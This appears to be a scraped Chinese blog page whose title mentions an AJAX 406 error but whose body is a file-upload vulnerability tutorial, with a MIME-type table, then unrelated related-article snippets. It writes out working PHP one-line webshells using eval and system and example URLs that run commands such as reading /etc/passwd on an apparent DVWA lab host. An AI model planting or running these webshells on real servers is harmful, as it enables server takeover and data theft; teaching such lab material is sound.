2. 程式人生 > 實用技巧 >ajax請求響應406錯誤

ajax請求響應406錯誤

阿新 發佈:2020-07-30

簡介

  1. 檔案上傳(File Upload )是大部分Web應用都具備的功能,例如使用者上傳附件、修改頭像、分享圖片/視訊等
  2. 正常的檔案一般是文件、圖片、視訊等, Web應用收集之後放入後臺儲存,需要的時候再調用出來返回
  3. 如果惡意檔案如PHP,ASP等執行檔案繞過web應用,並順利執行,則相當於黑客直接拿到了webshe11
  4. 一旦黑客拿到Webshel1 ,則可以拿到Web應用的資料,刪除Web檔案,本地提權,進一步拿下整個伺服器甚至內網
  5. SQL注入攻擊的物件是資料庫服務,檔案上傳漏洞主要攻擊Web服務,實際滲透兩種相結合,達到對目標的深度控制

實驗

實驗一

實驗二

型別 描述 典型示例
text 表明檔案是普通文字,理論上是人類可讀 text/plain, text/html, text/css, text/javascript
image 表明是某種影象。不包括視訊,但是動態圖(比如動態gif)也使用image型別 image/gif, image/png, image/jpeg, image/bmp, image/webp, image/x-icon, image/vnd.microsoft.icon
audio 表明是某種音訊檔案 audio/midi, audio/mpeg, audio/webm, audio/ogg, audio/wav
video 表明是某種視訊檔案 video/webm
, video/ogg
application 表明是某種二進位制資料 application/octet-stream, application/pkcs12, application/vnd.mspowerpoint, application/xhtml+xml, application/xml, application/pdf

對於text檔案型別若沒有特定的subtype,就使用 text/plain。類似的,二進位制檔案沒有特定或已知的 subtype,即使用 application/octet-stream

Webshell

小馬:一句話木馬也稱為小馬,即整個shell程式碼量只有一行,一般是系統執行函式

大馬:程式碼量和功能比小馬多,一般會進行二次編碼加密,防止被安全防火牆/入侵系統檢測到

shell1.php #檔名稱

eval使用php函式,例如phpinfo()

程式碼如下

<?php eval($_REQUEST['password']);?>

示例

http://10.3.139.173/dvwa/hackable/uploads/shell1.php?password=phpinfo();

shell2.php #檔名稱

system使用Linux系統命令,例如1s,cp,rm

程式碼如下

<?php system($_REQUEST['password']);?>

示例

http://10.3.139.173/dvwa/hackable/uploads/shell2php?password=cat /etc/passwd

<?php @eval($_POST['password']);?>

說明:REQUEST是在網頁端輸入變數訪問,POST則是使用像中國菜刀之類的工具連線,是C/S架構。

相關推薦

ajax請求響應406錯誤

HTTP Status 406 - typeStatus report message descriptionThe resource identified by this request is only capable of generating responses with characteristics not acceptable according to the request \"a

spring升級後Ajax請求出錯(406 Not Acceptable)

1.背景 由於業務需要,今天公司的JDK升級到1.8,容器要求Spring也需要同時升級到4.0+,解決完依賴的問題之後,程式碼啟動成功,頁面展示正常,但是遇到Ajax請求的地方就炸了,錯誤碼406,導致請求失敗,內容無法正常返

7、SpringMVC之Ajax請求響應

##1、測試使用JQuery點點選事件是否成功 //引入jQuery檔案 <script src="js/jquery.min.js"></script>

原生javascript的ajax請求及後臺PHP響應操作示例

本文例項講述了原生javascript的ajax請求及後臺PHP響應操作。分享給大家供大家參考,具體如下:

響應Ajax請求的Json被中的”被轉義成\"

問題描述- 今天寫了一些程式碼,功能大概前端傳送Ajax請求,後端查詢資料庫後將結果陣列封裝成Json字串格式返回頁面。對Json的處理使用的類庫為Jackson。

SpringMVC請求/響應亂碼問題解決方案解析

這篇文章主要介紹了SpringMVC請求/響應亂碼問題解決方案解析,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

如何使用Spring Cloud Feign日誌檢視請求響應

這篇文章主要介紹瞭如何使用Spring Cloud Feign日誌檢視請求響應,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

Javascript原生ajax請求程式碼例項

這篇文章主要介紹了Javascript原生ajax請求程式碼例項,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

php下的原生ajax請求用法例項分析

本文例項講述了php下的原生ajax請求用法。分享給大家供大家參考,具體如下:

淺析Django 接收所有檔案,前端展示檔案(包括視訊,檔案,圖片)ajax請求

如果是後臺上傳檔案: setting配置: STATIC_URL = \'/static/\' STATICFILES_DIRS = [ os.path.join(BASE_DIR,\'static\'),os.path.join(BASE_DIR,\"media\"),]

Java後臺判斷ajax請求及處理過程詳解

一、問題描述: 當訪問一個需要登入的頁面時,會有過濾器或者攔截器進行過濾攔截,如果使用者沒有登入,則跳轉到登入頁面。

Python發起請求提示UnicodeEncodeError錯誤程式碼解決方法

具體錯誤: UnicodeEncodeError: \'latin-1\' codec can\'t encode characters in position 73-74: Body (\'測試\') is not valid Latin-1. Use body.encode(\'utf-8\') if you want to send it encoded in UTF-8.

SpringBoot基於Shiro處理ajax請求程式碼例項

寫一個Shiro的過濾器 import cn.erika.demo.common.model.vo.Message; import com.alibaba.fastjson.JSON;

Springmvc處理ajax請求並返回json資料

①在springmvc方法上新增@ResponseBody註解,springmvc會將資料轉換成json並返回; @ResponseBody //指定返回json資料,不跳轉頁面

判斷是否為AJAX請求

下面是.net後端判斷請求是否為AJAX請求的方法: /// <summary> /// 判斷是否為AJAX請求

Ajax請求傳遞data資料三種格式:

ajax有三種傳遞傳遞data的方式: 1、json格式 2、標準引數模式 3、json字串格式 1.json物件格式:

關於IE下的頁面快取和Ajax請求問題

ASP.NET幾種清除頁面快取的方法 在asp.net中使用模式dialog時,你會發現每次開啟的頁面都是相同的內容,頁面內容並沒有重新整理,這是快取的原因造成的,

ajax請求Token(未經測試)

function gettoken() { $.ajax({ //提交資料的型別 POST GET type:"get", //提交的網址 url: "http://localhost/machinearmbackend/api/abc ",

change 和 propertychange 事件監聽input 併發起ajax請求

一、用到的主要事件 change 和propertychange 1. change 事件在內容改變(兩次內容有可能還是相等的)且失去焦點時觸發;2. propertychange 事件是實時觸發,即每增加或刪除一個字元就會觸發

springmvc環境下的ajax請求

前端傳送陣列 1、準備要傳送的陣列   var array = [5,8,12]; 2、將JSON陣列轉換為JSON字串